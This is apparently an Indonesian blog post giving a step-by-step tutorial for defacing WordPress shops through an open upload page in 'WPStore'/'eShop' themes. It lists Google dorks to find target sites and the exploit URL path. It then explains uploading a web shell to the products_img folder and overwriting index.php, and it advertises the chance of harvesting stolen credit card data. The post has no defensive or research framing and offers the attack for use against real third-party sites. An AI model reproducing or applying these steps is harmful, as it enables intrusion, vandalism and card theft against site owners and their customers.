Cara Deface Web dengan Metode Wp-Store Uploader
Metode Wp-Store Uploader sekalian cari cc fresh:3
Kelebihan menggunakan teknik ini:
1. Jika anda beruntung, anda bisa
mendapatkan kartu kredit (cc).
2. Cara penggunaannya relatif mudah.
Langkah-Langkah:
1. Cari target dengan Google Dork ini:
inurl:/wp-content/themes/eShop/
inurl:/wp-content/themes/WPStore/
inurl:/wp-content/themes/Store/
*ente bisa menambahkan elemen Site:
Di belakang Google Dork Tersebut
Ex: site:co.uk dll
2. Setelah Target ditemukan. langkah
selanjutnya adalah masukkan exploit ini:
/wp-content/themes/WPStore/upload/
ex: site.com/wp-content/themes/
eShop/style.css
menjadi
site.com/ wp-content/themes/WPStore/
upload/
3. Setelah muncul tampilan. Lalu ente Upload
Shell / Script Deface dalam bentuk .html om..
4. Setelah selesai, masukkan wp-
content/uploads/products_img/
namashell.php setelah alamat web
target.
Ex: site.com/ wp-content/themes/
WPStore/upload/
menjadi
site.com/ wp-content/uploads/
products_img/namashell.php
*nama shell diganti dengan nama shell ente..
*jika 404 not found, berarti web tersebut
tidak bisa di tanam shell. dan cobalah
untuk mengupload script deface.
5. Setelah masuk ke dalam shell. Tebas
deh index.php nya. bukan index.html
nya om..
Good Joob :)
0 Comments
Bagaimana Pendapat Anda ?